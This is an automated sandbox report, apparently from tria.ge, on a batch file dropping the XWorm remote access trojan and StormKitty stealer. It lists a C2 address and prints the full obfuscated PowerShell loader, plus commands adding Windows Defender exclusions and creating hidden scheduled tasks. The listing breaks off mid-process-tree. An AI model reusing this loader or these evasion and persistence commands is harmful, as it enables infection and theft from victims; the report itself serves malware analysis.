Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

18/10/2024, 20:33 UTC

241018-zbw8waydrn 10

18/10/2024, 20:16 UTC

241018-y2b5yswdld 10

Analysis

  • max time kernel
    257s
  • max time network
    268s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18/10/2024, 20:16 UTC

Errors

Reason
Machine shutdown

General

  • Target

    skibidi toilet.bat

  • Size

    385KB

  • MD5

    bd4af530d004a712f796171f4c748bd0

  • SHA1

    22b50637859441a9024bef4c367f4ddb4bc12a9c

  • SHA256

    57e2b4dc37fad695aaf7cd4841e37d66c7a84fe61eefbc1183261b628ac87dbf

  • SHA512

    b7266ca4041ec8c1b9b59b0075d154c6100f8431903701522c51c31cfcece84ccec2623dad9a9a13b266e6d252f7393c27536994ef76c079f5f18bd9e66f126b

  • SSDEEP

    6144:UfSqeucViW45gbfeJxrvJYYVOfpsMRxUQvRRTpFvGHk46g+o:Uz4C3JdngbIMRZfeHF

Malware Config

Extracted

Family

xworm

C2

193.161.193.99:25993

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect Xworm Payload 1 IoCs
  • Modifies firewall policy service 3 TTPs 3 IoCs
  • Modifies security service 2 TTPs 4 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 10 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Modifies data under HKEY_USERS 42 IoCs
  • Modifies registry class 41 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch -p
    1⤵
    • Modifies registry class
    PID:796
    • C:\Windows\System32\mousocoreworker.exe
      C:\Windows\System32\mousocoreworker.exe -Embedding
      2⤵
        PID:4664
      • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
        C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
        2⤵
          PID:3124
        • C:\Windows\system32\backgroundTaskHost.exe
          "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
          2⤵
            PID:3972
          • C:\Windows\system32\backgroundTaskHost.exe
            "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
            2⤵
              PID:2656
            • C:\Windows\system32\backgroundTaskHost.exe
              "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
              2⤵
                PID:4936
              • C:\Windows\system32\BackgroundTransferHost.exe
                "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                2⤵
                  PID:5092
                • C:\Windows\system32\BackgroundTransferHost.exe
                  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                  2⤵
                    PID:2160
                  • C:\Windows\system32\backgroundTaskHost.exe
                    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                    2⤵
                      PID:3876
                    • C:\Windows\system32\BackgroundTransferHost.exe
                      "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                      2⤵
                        PID:1100
                      • C:\Windows\system32\BackgroundTransferHost.exe
                        "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                        2⤵
                          PID:1564
                        • C:\Windows\system32\backgroundTaskHost.exe
                          "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                          2⤵
                            PID:2416
                          • C:\Windows\system32\BackgroundTaskHost.exe
                            "C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider
                            2⤵
                              PID:4160
                            • C:\Windows\system32\DllHost.exe
                              C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                              2⤵
                                PID:760
                              • C:\Windows\System32\CompPkgSrv.exe
                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                2⤵
                                  PID:2124
                                • C:\Windows\System32\CompPkgSrv.exe
                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                  2⤵
                                    PID:3800
                                  • C:\Windows\system32\BackgroundTaskHost.exe
                                    "C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider
                                    2⤵
                                      PID:3396
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k RPCSS -p
                                    1⤵
                                      PID:900
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                      1⤵
                                        PID:952
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                        1⤵
                                          PID:392
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                          1⤵
                                            PID:1032
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                            1⤵
                                              PID:1068
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                              1⤵
                                                PID:1072
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
                                                1⤵
                                                  PID:1120
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                  1⤵
                                                    PID:1188
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                    1⤵
                                                    • Drops file in System32 directory
                                                    PID:1204
                                                    • C:\Users\Admin\AppData\Roaming\System User
                                                      "C:\Users\Admin\AppData\Roaming\System User"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:5012
                                                    • C:\Users\Admin\AppData\Roaming\System User
                                                      "C:\Users\Admin\AppData\Roaming\System User"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:3468
                                                    • C:\Users\Admin\AppData\Roaming\System User
                                                      "C:\Users\Admin\AppData\Roaming\System User"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:3876
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                    1⤵
                                                      PID:1264
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                      1⤵
                                                        PID:1300
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                        1⤵
                                                          PID:1372
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                          1⤵
                                                            PID:1396
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                            1⤵
                                                              PID:1492
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                              1⤵
                                                                PID:1568
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                                1⤵
                                                                  PID:1584
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                                  1⤵
                                                                    PID:1672
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                    1⤵
                                                                      PID:1728
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                      1⤵
                                                                        PID:1764
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                                        1⤵
                                                                          PID:1796
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                          1⤵
                                                                            PID:1848
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                                            1⤵
                                                                              PID:1952
                                                                            • C:\Windows\System32\svchost.exe
                                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                                              1⤵
                                                                                PID:1964
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                                                1⤵
                                                                                  PID:2000
                                                                                • C:\Windows\System32\svchost.exe
                                                                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                                                  1⤵
                                                                                    PID:1144
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
                                                                                    1⤵
                                                                                    • Modifies firewall policy service
                                                                                    • Modifies security service
                                                                                    PID:2088
                                                                                  • C:\Windows\System32\svchost.exe
                                                                                    C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                                    1⤵
                                                                                      PID:2176
                                                                                    • C:\Windows\System32\svchost.exe
                                                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                                      1⤵
                                                                                        PID:2232
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                                        1⤵
                                                                                          PID:2248
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                                          1⤵
                                                                                            PID:2480
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                                            1⤵
                                                                                              PID:2488
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                              1⤵
                                                                                                PID:2732
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                                                1⤵
                                                                                                • Drops file in System32 directory
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:2752
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                                                1⤵
                                                                                                • Enumerates connected drives
                                                                                                PID:2840
                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                                1⤵
                                                                                                  PID:2864
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                                  1⤵
                                                                                                    PID:2876
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                                    1⤵
                                                                                                      PID:920
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                      1⤵
                                                                                                        PID:3364
                                                                                                      • C:\Windows\Explorer.EXE
                                                                                                        C:\Windows\Explorer.EXE
                                                                                                        1⤵
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                                        • Suspicious use of UnmapMainImage
                                                                                                        PID:3436
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\skibidi toilet.bat"
                                                                                                          2⤵
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:2212
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('om5QDpz+YB720rzQSYX8wId74inmoR6vz07aL7HDKD0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aq3pnaEo9mphTtVuzj3ZHw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $TnSRM=New-Object System.IO.MemoryStream(,$param_var); $QPGnf=New-Object System.IO.MemoryStream; $HCoKQ=New-Object System.IO.Compression.GZipStream($TnSRM, [IO.Compression.CompressionMode]::Decompress); $HCoKQ.CopyTo($QPGnf); $HCoKQ.Dispose(); $TnSRM.Dispose(); $QPGnf.Dispose(); $QPGnf.ToArray();}function execute_function($param_var,$param2_var){ $deAso=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $EqiGg=$deAso.EntryPoint; $EqiGg.Invoke($null, $param2_var);}$qfQMh = 'C:\Users\Admin\AppData\Local\Temp\skibidi toilet.bat';$host.UI.RawUI.WindowTitle = $qfQMh;$UJtTy=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($qfQMh).Split([Environment]::NewLine);foreach ($rTczV in $UJtTy) { if ($rTczV.StartsWith('KUVjIfwfBwDfXoqrZwfw')) { $XCsJx=$rTczV.Substring(20); break; }}$payloads_var=[string[]]$XCsJx.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                                            3⤵
                                                                                                              PID:2116
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                              3⤵
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              • Modifies registry class
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:2668
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_862_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_862.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                                                4⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:1696
                                                                                                              • C:\Windows\System32\WScript.exe
                                                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_862.vbs"
                                                                                                                4⤵
                                                                                                                • Checks computer location settings
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:4152
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_862.bat" "
                                                                                                                  5⤵
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:880
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('om5QDpz+YB720rzQSYX8wId74inmoR6vz07aL7HDKD0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aq3pnaEo9mphTtVuzj3ZHw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $TnSRM=New-Object System.IO.MemoryStream(,$param_var); $QPGnf=New-Object System.IO.MemoryStream; $HCoKQ=New-Object System.IO.Compression.GZipStream($TnSRM, [IO.Compression.CompressionMode]::Decompress); $HCoKQ.CopyTo($QPGnf); $HCoKQ.Dispose(); $TnSRM.Dispose(); $QPGnf.Dispose(); $QPGnf.ToArray();}function execute_function($param_var,$param2_var){ $deAso=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $EqiGg=$deAso.EntryPoint; $EqiGg.Invoke($null, $param2_var);}$qfQMh = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_862.bat';$host.UI.RawUI.WindowTitle = $qfQMh;$UJtTy=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($qfQMh).Split([Environment]::NewLine);foreach ($rTczV in $UJtTy) { if ($rTczV.StartsWith('KUVjIfwfBwDfXoqrZwfw')) { $XCsJx=$rTczV.Substring(20); break; }}$payloads_var=[string[]]$XCsJx.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                                                    6⤵
                                                                                                                      PID:4980
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                                      6⤵
                                                                                                                      • Blocklisted process makes network request
                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                      • Drops startup file
                                                                                                                      • Adds Run key to start application
                                                                                                                      • Sets desktop wallpaper using registry
                                                                                                                      • Checks processor information in registry
                                                                                                                      • Enumerates system info in registry
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:4144
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                                                                                                                        7⤵
                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:532
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                                                                                                                        7⤵
                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:616
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System User'
                                                                                                                        7⤵
                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:5080
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System User'
                                                                                                                        7⤵
                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        PID:2064
                                                                                                                      • C:\Windows\System32\schtasks.exe
                                                                                                                        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\Admin\AppData\Roaming\System User"
                                                                                                                        7⤵
                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                        PID:2680
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html
                                                                                                                        7⤵
                                                                                                                        • Enumerates system info in registry
                                                                                                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                        PID:3636
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdd37e46f8,0x7ffdd37e4708,0x7ffdd37e4718
                                                                                                                          8⤵
                                                                                                                            PID:4440
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,16232176502312801355,6599735231035662222,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
                                                                                                                            8⤵
                                                                                                                              PID:4124
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,16232176502312801355,6599735231035662222,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
                                                                                                                              8⤵
                                                                                                                                PID:3160
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,16232176502312801355,6599735231035662222,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2804 /prefetch:8
                                                                                                                                8⤵
                                                                                                                                  PID:4548
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,16232176502312801355,6599735231035662222,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
                                                                                                                                  8⤵
                                                                                                                                    PID:2304
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,16232176502312801355,6599735231035662222,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
                                                                                                                                    8⤵
                                                                                                                                      PID:4612
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,16232176502312801355,6599735231035662222,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5128 /prefetch:8
                                                                                                                                      8⤵
                                                                                                                                        PID:2556
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,16232176502312801355,6599735231035662222,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5128 /prefetch:8
                                                                                                                                        8⤵
                                                                                                                                          PID:4060
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,16232176502312801355,6599735231035662222,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:1
                                                                                                                                          8⤵
                                                                                                                                            PID:2448
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,16232176502312801355,6599735231035662222,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4720 /prefetch:1
                                                                                                                                            8⤵
                                                                                                                                              PID:3228
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
